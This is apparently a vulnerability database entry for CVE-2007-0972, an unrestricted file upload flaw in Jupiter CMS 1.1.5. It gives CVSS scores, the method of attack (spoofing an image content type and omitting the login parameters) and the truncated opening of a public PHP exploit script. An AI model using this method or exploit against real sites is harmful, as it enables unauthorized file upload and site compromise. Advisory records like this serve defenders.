7.5
CVSSv2

CVE-2007-0972

Published: 16/02/2007 Updated: 16/10/2018
CVSS v2 Base Score: 7.5 | Impact Score: 6.4 | Exploitability Score: 10
VMScore: 755
Vector: AV:N/AC:L/Au:N/C:P/I:P/A:P

Vulnerability Summary

Unrestricted file upload vulnerability in modules/emoticons.php in Jupiter CMS 1.1.5 allows remote malicious users to upload arbitrary files by modifying the HTTP request to send an image content type, and to omit is_guest and is_user parameters. NOTE: this issue might be related to CVE-2006-4875.

Vulnerable Product Search on Vulmon Subscribe to Product

jupiter cms jupiter cms 1.1.5

Exploits

<? /* Title: Jupiter CMS 115 File Upload Vulnerability Advisory ID: 12070214 Risk level: High Author: DarkFig <gmdarkfig@gmailcom> URL: wwwacid-rootnewfr/advisories/12070214txt */ error_reporting(E_ALL ^ E_NOTICE); $url = ' localhost/jupiter/'; $xpl = new phpsploit(); $xpl->agent ...